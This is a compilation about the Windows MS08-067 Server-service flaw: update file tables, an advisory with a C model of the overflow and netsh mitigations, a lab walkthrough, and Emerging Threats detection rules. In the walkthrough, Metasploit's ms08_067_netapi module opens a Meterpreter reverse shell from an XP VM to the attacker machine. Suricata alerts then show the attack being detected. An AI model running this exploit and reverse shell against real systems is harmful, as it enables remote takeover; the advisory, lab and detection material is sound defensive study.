| Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,465 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,470 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,470 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,475 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,475 | 21-Oct-2008 | 21:07 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest | Not Applicable | 2,401 | 18-Oct-2008 | 06:13 | Not Applicable |
| X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest | Not Applicable | 2,187 | 21-Oct-2008 | 08:25 | Not Applicable |


Additional files for all supported ia64-based versions of Windows 7 Pre-Beta

| File name | File version | File size | Date (UTC) | Time (UTC) | Platform |
|---|---|---|---|---|---|
| Ia64_063c1cfe8cbabfce3ffb0dc28ef38fc5_31bf3856ad364e35_6.1.6801.4107_none_b39a525ed326a3c8.manifest | Not Applicable | 696 | 21-Oct-2008 | 21:07 | Not Applicable |
| Ia64_dc308b4973bef77766097858c0f07d87_31bf3856ad364e35_6.1.6801.4106_none_5a453cd060e99fe3.manifest | Not Applicable | 696 | 18-Oct-2008 | 09:47 | Not Applicable |
| Ia64_f556a82744118350805ca73aa737ccaa_31bf3856ad364e35_6.1.6801.4107_none_ff5785ba70f128b5.manifest | Not Applicable | 1,035 | 21-Oct-2008 | 21:07 | Not Applicable |
| Ia64_f6840120760844e1cf48807bba0611b4_31bf3856ad364e35_6.1.6801.4106_none_0132ac58e91cf28f.manifest | Not Applicable | 1,035 | 18-Oct-2008 | 09:47 | Not Applicable |
| Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c6137e8d07b2393d.manifest | Not Applicable | 2,402 | 18-Oct-2008 | 05:34 | Not Applicable |
| Ia64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68eda12d50435af6.manifest | Not Applicable | 2,188 | 21-Oct-2008 | 06:53 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 2,040 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 2,040 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 1,827 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 1,827 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 1,468 | 18-Oct-2008 | 09:47 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 1,468 | 21-Oct-2008 | 21:07 | Not Applicable |
| Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 1,469 | 18-Oct-2008 | 09:47 | Not Applicable |

File name

Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,469

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,472

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,472

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,460

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,460

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest

File version

Not Applicable

File size

2,401

Date (UTC)

18-Oct-2008

Time (UTC)

06:13

Platform

Not Applicable

File name

X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest

File version

Not Applicable

File size

2,187

Date (UTC)

21-Oct-2008

Time (UTC)

08:25

Platform

Not Applicable

Yesterday Microsoft released the out-of-band update MS08-067, which fixes a critical vulnerability in the Server service of all Windows operating systems. In this article we try to set out as many details as possible and give recommendations for mitigating the vulnerability.

Brief description of the vulnerability

The vulnerability is caused by an error in netapi32.dll when the Server service processes RPC requests. A remote user can send a specially crafted RPC request to trigger a stack-based buffer overflow and either crash the system (denial of service) or execute arbitrary code on the target system with SYSTEM privileges.

Technical details

The flaw is in the path canonicalization code of netapi32.dll that the Server service runs on attacker-supplied paths. Inside a while() loop that collapses ".." components, the remaining path is copied with wcscpy_s(dest, len, source), reached through the macro

_tcscpy_s(previousLastSlash, pBufferEnd - previousLastSlash, ptr + 2);

Both the destination pointer previousLastSlash and the size argument pBufferEnd - previousLastSlash are recomputed on every iteration from pointers that move according to the input. A crafted sequence of ".." components walks previousLastSlash backwards past the start of the buffer, so the size handed to the "safe" copy is larger than the space that actually remains and the copy overruns the stack buffer. A bounds-checked string function offers no protection when the bound itself is derived from attacker-controlled pointer arithmetic.
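The pattern described above, as an added illustrative model written for this page (it is not the netapi32.dll code; the names buf, pBufferEnd, previousLastSlash and ptr only mirror the macro quoted in the text): a path buffer sits at an offset inside a larger array standing in for the surrounding stack frame, ".." components are collapsed in place, and the destination size handed to a bounded copy is computed as pBufferEnd - previousLastSlash. The flawed variant lets the backward search for the previous backslash run before the start of the buffer; instead of performing the out-of-bounds write, the model reports it together with the size the copy would have been given. The hardened variant bounds the search at the buffer start and rejects paths that climb above the root. The sample paths and the backslash planted in the neighbouring cells are constructed test data.

```c
/* Added illustrative model of the MS08-067 pattern, written for this page.
 * NOT the netapi32.dll code; buf, pBufferEnd, previousLastSlash and ptr only
 * mirror the macro quoted in the text. "\..\" is collapsed in place inside a
 * path buffer that sits at an offset inside a simulated stack frame. */
#include <stddef.h>
#include <string.h>
#include <wchar.h>

#define FRAME_CAP 96                      /* simulated stack frame, in wide chars */
#define PATH_OFF  16                      /* the path buffer starts here */
#define PATH_CAP  (FRAME_CAP - PATH_OFF)  /* wide chars available to the path */

enum canon_result { CANON_OK = 0, CANON_REJECTED = 1, CANON_WOULD_OVERFLOW = 2 };

/* Stand-in for wcscpy_s/_tcscpy_s: trusts dst_len and fails only when src
 * does not fit into the size it was told about. */
static int bounded_wcscpy(wchar_t *dst, size_t dst_len, const wchar_t *src)
{
    size_t n = wcslen(src);
    if (n + 1 > dst_len) return -1;
    memmove(dst, src, (n + 1) * sizeof(wchar_t));   /* src and dst overlap */
    return 0;
}

/* hardened == 0 reproduces the flaw: the search for the previous '\' is not
 * bounded by the buffer start, and the copy size pBufferEnd - previousLastSlash
 * is only right while previousLastSlash is inside the buffer. The model stops
 * before the out-of-bounds write and reports the size the copy would get. */
enum canon_result canonicalize_model(wchar_t *frame, int hardened, size_t *bad_len)
{
    wchar_t *buf = frame + PATH_OFF;
    wchar_t *pBufferEnd = buf + PATH_CAP;
    wchar_t *ptr = buf;
    while (*ptr) {
        if (ptr[0] == L'\\' && ptr[1] == L'.' && ptr[2] == L'.' &&
            (ptr[3] == L'\\' || ptr[3] == L'\0')) {
            wchar_t *previousLastSlash = ptr - 1;          /* still >= frame */
            if (hardened) {
                while (previousLastSlash >= buf && *previousLastSlash != L'\\')
                    previousLastSlash--;
                if (previousLastSlash < buf) return CANON_REJECTED;   /* ".." above root */
            } else {
                /* Flawed: walks into whatever precedes the buffer ("> frame" only keeps the model memory-safe). */
                while (previousLastSlash > frame && *previousLastSlash != L'\\')
                    previousLastSlash--;
            }
            size_t len = (size_t)(pBufferEnd - previousLastSlash);  /* the macro's size argument */
            if (previousLastSlash < buf) {
                if (bad_len) *bad_len = len;     /* > PATH_CAP: the copy would overrun the buffer */
                return CANON_WOULD_OVERFLOW;
            }
            bounded_wcscpy(previousLastSlash, len, ptr + 3);  /* src lies inside [dst, pBufferEnd): always fits */
            ptr = previousLastSlash;             /* re-check the collapsed position */
            continue;
        }
        ptr++;
    }
    return CANON_OK;
}

/* Build a frame: filler before the path, optionally a '\' three cells before
 * the buffer (attacker-influenced neighbouring stack data), then run the model. */
enum canon_result run_model(const wchar_t *path, int neighbour_slash, int hardened,
                            wchar_t *out, size_t out_cap, size_t *bad_len)
{
    wchar_t frame[FRAME_CAP];
    for (size_t i = 0; i < PATH_OFF; i++) frame[i] = L'A';
    if (neighbour_slash) frame[PATH_OFF - 3] = L'\\';
    if (wcslen(path) >= PATH_CAP) return CANON_REJECTED;    /* model input must fit */
    wcscpy(frame + PATH_OFF, path);
    enum canon_result r = canonicalize_model(frame, hardened, bad_len);
    if (out && out_cap) { wcsncpy(out, frame + PATH_OFF, out_cap - 1); out[out_cap - 1] = L'\0'; }
    return r;
}

/* Constructed scenario: "\share\a\..\b" becomes "\share\b" in both variants. */
int model_benign_ok(int hardened)
{
    wchar_t out[PATH_CAP]; size_t bad = 0;
    return run_model(L"\\share\\a\\..\\b", 0, hardened, out, PATH_CAP, &bad) == CANON_OK
        && wcscmp(out, L"\\share\\b") == 0;
}

/* Constructed scenario: "\a\..\..\evil" with a '\' planted in the neighbouring cells. */
int model_crafted_result(int hardened)      /* hardened: CANON_REJECTED; flawed: CANON_WOULD_OVERFLOW */
{
    wchar_t out[PATH_CAP]; size_t bad = 0;
    return (int)run_model(L"\\a\\..\\..\\evil", 1, hardened, out, PATH_CAP, &bad);
}

size_t model_crafted_overflow_len(void)     /* size the flawed copy was about to get: PATH_CAP + 3 */
{
    wchar_t out[PATH_CAP]; size_t bad = 0;
    run_model(L"\\a\\..\\..\\evil", 1, 0, out, PATH_CAP, &bad);
    return bad;
}
```

The point the model makes is that both variants produce identical results on well-formed paths; the difference only shows when the input steers previousLastSlash outside the buffer, which is exactly the condition under which the "safe" size argument becomes meaningless.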

Severity

SecurityLab has assigned the vulnerability its highest severity rating: critical. The vulnerability is being actively exploited, and at the time of writing proof-of-concept code is publicly available.

The vulnerability can be exploited by an anonymous user on Windows 2000/XP/2003 and by an authenticated user on Windows Vista/2008. To exploit it, the attacker needs access to the system's RPC interface. The firewall is enabled by default on Windows XP SP2, Windows Vista and Windows Server 2008, so an attacker can exploit the vulnerability in the following cases:

  • the firewall is disabled
  • the firewall is enabled, but the File and Printer Sharing exception is also allowed

The following table shows the exposure of each platform (a "+" marks an access vector that applies or a protection that is in effect; the asterisks are explained in the notes below):

Platform / scenario | Anonymous access | Authentication | DEP | ASLR | Firewall
Windows 2000 - remote code execution
  Domain-joined workstation | + | | | |
  File and printer sharing | + | | | |
  Home PC | + | | | |
  Access to shared files (home PC) | + | | | |
Windows XP SP2 - remote code execution (DEP without ASLR)
  Domain-joined workstation | + | | + | | *
  File and printer sharing | + | | + | |
  Home PC | + | | + | | +
  Access to shared files (home PC) | + | | + | |
Windows Server 2003 - remote code execution (DEP without ASLR)
  Domain-joined workstation | + | | + | |
  File and printer sharing | + | | + | |
  Home PC | + | | + | |
  Access to shared files (home PC) | + | | + | |
Windows Vista - denial of service (DEP+ASLR)
  Domain-joined workstation | | + | + | + | *
  File and printer sharing | | + | + | + | **
  Home PC | | + | + | + | +
  Password-protected access to shared files (home PC) | | + | + | + | ***
Windows Server 2008 - denial of service (DEP+ASLR)
  Domain-joined workstation | | + | + | + | *
  File and printer sharing | | + | + | + | **
  Home PC | | + | + | + | +
  Password-protected access to shared files (home PC) | | + | + | + | ***

Notes:
* The firewall is enabled by default with no exceptions, although many domains enable exceptions.
** File and Printer Sharing enables an exception for the corresponding network location type; sharing enabled on a private network does not allow access from a public network.
*** Turning off password-protected sharing automatically allows anonymous connections.

Protection and countermeasures

Workarounds

The following steps eliminate or reduce the risk of successful exploitation, but may affect the operation of your network.

1. For all operating systems:

  • Disable the Server and Computer Browser services
  • Block access to ports 139/tcp and 445/tcp

2. Filter the vulnerable RPC interface identifier.

  • Windows Vista and Windows Server 2008

In addition to blocking ports, Windows Vista and Windows Server 2008 can selectively block RPC Universally Unique Identifiers (UUIDs). To block the vulnerable interface, add a rule that blocks all RPC requests whose interface UUID equals 4b324fc8-1670-01d3-1278-5a47bf6ee188. Example:
netsh>rpc
netsh rpc>filter
netsh rpc filter>add rule layer=um actiontype=block
netsh rpc filter>add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188
netsh rpc filter>add filter
netsh rpc filter>quit
The filter key is a UUID generated at random for your system. To verify that the filter is in place, run:

netsh rpc filter show filter

If the filter was added successfully, the command prints the following:

Listing all RPC Filters.
---------------------------------
filterKey: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
displayData.name: RPCFilter
displayData.description: RPC Filter
filterId: 0x12f79
layerKey: um
weight: Type: FWP_EMPTY Value: Empty
action.type: block
numFilterConditions: 1

where filterKey: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx is your randomly generated UUID.

To remove the filter after installing the update, run:

netsh rpc filter delete filter filterkey=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

  • Firewalls that can filter RPC traffic (for example, ISA Server)

Create a rule that blocks RPC traffic with interface UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188.

3. Change the access control lists on the vulnerable named pipes

Microsoft has released a utility (http://blogs.technet.com/swi/attachment/3140932.ashx) that changes the access control lists on the named pipes for the current session.

Usage example:

For the Server service:

C:\>chacl.exe \\.\pipe\srvsvc
opening up \\.\pipe\srvsvc
Got back 3 ACE entries
Found an entry for ANONYMOUS LOGON. Deleting it...
deleted that ACE

For the Computer Browser service:

C:\>chacl.exe \\.\pipe\browser
opening up \\.\pipe\browser
Got back 3 ACE entries
Found an entry for ANONYMOUS LOGON. Deleting it...
deleted that ACE

The utility removes ANONYMOUS LOGON from the named-pipe ACLs, which limits the attack to authenticated users.

Note: this change lasts only for the current session; after a reboot the steps above must be repeated.

References:

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
http://blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx
http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx
http://blogs.technet.com/swi/attachment/3140932.ashx
http://technet.microsoft.com/ru-ru/library/cc751161(en-us).aspx
http://www.securitylab.ru/vulnerability/361770.php
http://www.securitylab.ru/poc/361823.php

Valery Marchuk (Валерий Марчук)
www.Securitylab.ru

{Requirements:}
————————
All machines running as VMs

1. Kali Linux (172.16.66.193)
2. Windows XP SP2 (172.16.66.199)
3. IDS: Suricata

{Scan for open ports:}
———————————-
root@fikri:~# nmap -n -sV 172.16.66.199

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-17 10:25 MYT
Nmap scan report for 172.16.66.199
Host is up (0.11s latency).
Not shown: 918 closed ports, 79 filtered ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows 98 netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:D1:55:23 (VMware)
Service Info: OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.51 seconds

{Exploit:}
—————
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 172.16.66.199
RHOST => 172.16.66.199
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.66.199    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 172.16.66.193
LHOST => 172.16.66.193
msf exploit(ms08_067_netapi) > set LPORT 6666
LPORT => 6666
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.66.193:6666
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 172.16.66.199
[*] Meterpreter session 1 opened (172.16.66.193:6666 -> 172.16.66.199:1069) at 2015-12-17 10:41:14 +0800

{Suricata}
—————

12/17/2015-10:41:18.639748  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable Code was Detected] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable Code was Detected] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445

{"timestamp":"2015-12-17T10:25:50.527735","event_type":"http","src_ip":"172.16.66.193","src_port":35357,"dest_ip":"172.16.66.199","dest_port":139,"proto":"TCP","http":{"url":"/","http_method":"GET","protocol":"HTTP/1.0","length":0}}
{"timestamp":"2015-12-17T10:25:50.527735","event_type":"http","src_ip":"172.16.66.193","src_port":35357,"dest_ip":"172.16.66.199","dest_port":139,"proto":"TCP","http":{"url":"/","http_method":"GET","protocol":"HTTP/1.0","length":0}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2008705,"rev":5,"signature":"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2009247,"rev":3,"signature":"ET SHELLCODE Rothenburg Shellcode","category":"Executable Code was Detected","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2008705,"rev":5,"signature":"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2009247,"rev":3,"signature":"ET SHELLCODE Rothenburg Shellcode","category":"Executable Code was Detected","severity":1}}

{References:}
1. https://community.rapid7.com/community/infosec/blog/2014/02/03/new-ms08-067

2009886

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS Remote SMB2.0 DoS Exploit"; flow:to_server,established; content:"|ff|SMB|72 00 00 00 00 18 53 c8|"; offset:4; content:!"|00 00|"; within:2; reference:url,securityreason.com/exploitalert/7138; reference:url,doc.emergingthreats.net/2009886; classtype:attempted-dos; sid:2009886; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Remote SMB2.0 DoS Exploit

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : url,securityreason.com/exploitalert/7138|url,doc.emergingthreats.net/2009886

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2000046

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS MS04011 Lsasrv.dll RPC exploit (Win2k)"; flow: to_server,established; content:"|00 00 00 00 9A A8 40 00 01 00 00 00 00 00 00 00|"; content:"|01 0000 00 00 00 00 00 9A A8 40 00 01 00 00 00|"; reference:url,doc.emergingthreats.net/bin/view/Main/2000046; reference:cve,2003-0533; classtype:misc-activity; sid:2000046; rev:9; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : MS04011 Lsasrv.dll RPC exploit (Win2k)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-activity

URL reference : url,doc.emergingthreats.net/bin/view/Main/2000046|cve,2003-0533

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2000033

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS MS04011 Lsasrv.dll RPC exploit (WinXP)"; flow: to_server,established; content:"|95 14 40 00 03 00 00 00 7C 70 40 00 01|"; content:"|78 85 13 00 AB5B A6 E9 31 31|"; reference:url,doc.emergingthreats.net/bin/view/Main/2000033; reference:cve,2003-0533; classtype:misc-activity; sid:2000033; rev:9; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : MS04011 Lsasrv.dll RPC exploit (WinXP)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-activity

URL reference : url,doc.emergingthreats.net/bin/view/Main/2000033|cve,2003-0533

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002064

#alert tcp $HOME_NET 445 -> $EXTERNAL_NET any (msg:"ET NETBIOS ms05-011 exploit"; flow:from_server,established; content:"|00|"; depth:1; content:"|FF|SMB|32|"; depth:9; offset:4; content: "|ff ff ff ff 00 00 00 00 ff|"; offset: 132; depth: 141; reference:bugtraq,12484; reference:url,www.frsirt.com/exploits/20050623.mssmb_poc.c.php; reference:url,doc.emergingthreats.net/bin/view/Main/2002064; classtype:attempted-admin; sid:2002064; rev:7; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : ms05-011 exploit

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,12484|url,www.frsirt.com/exploits/20050623.mssmb_poc.c.php|url,doc.emergingthreats.net/bin/view/Main/2002064

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002186

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|67157a76|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; reference:url,isc.sans.org/diary.php?date=2005-08-14; reference:url,doc.emergingthreats.net/bin/view/Main/2002186; classtype:attempted-admin; sid:2002186; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx|url,isc.sans.org/diary.php?date=2005-08-14|url,doc.emergingthreats.net/bin/view/Main/2002186

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002199

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB-DS DCERPC PnP HOD bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:4; content:"|0B|"; within:1; distance:1; content:"|40 4E 9F 8D 3D A0 CE 11 8F 69 08 00 3E 30 05 1B|"; flowbits:set,netbios.pnp.bind.attempt; flowbits:noalert; reference:url,doc.emergingthreats.net/bin/view/Main/2002199; classtype:protocol-command-decode; sid:2002199; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB-DS DCERPC PnP HOD bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : url,doc.emergingthreats.net/bin/view/Main/2002199

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002200

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB-DS DCERPC PnP bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:2; content:"|0B|"; within:1; distance:1; content:"|40 4E 9F 8D 3D A0 CE 11 8F 69 08 00 3E 30 05 1B|"; flowbits:set,netbios.pnp.bind.attempt; flowbits:noalert; reference:url,doc.emergingthreats.net/bin/view/Main/2002200; classtype:protocol-command-decode; sid:2002200; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB-DS DCERPC PnP bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : url,doc.emergingthreats.net/bin/view/Main/2002200

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002201

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB-DS DCERPC PnP QueryResConfList exploit attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|36 00|"; within:2; distance:26; pcre:"/(\x00\x00.*?){2}\x00{2}\xFF{2}.{128,}[\x04-\xFF][\x00-\xFF]{3}\x00{4}$/Rs"; flowbits:isset,netbios.pnp.bind.attempt; reference:cve,CAN-2005-1983; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; reference:url,doc.emergingthreats.net/bin/view/Main/2002201; classtype:attempted-admin; sid:2002201; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB-DS DCERPC PnP QueryResConfList exploit attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,CAN-2005-1983|url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx|url,doc.emergingthreats.net/bin/view/Main/2002201

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002202

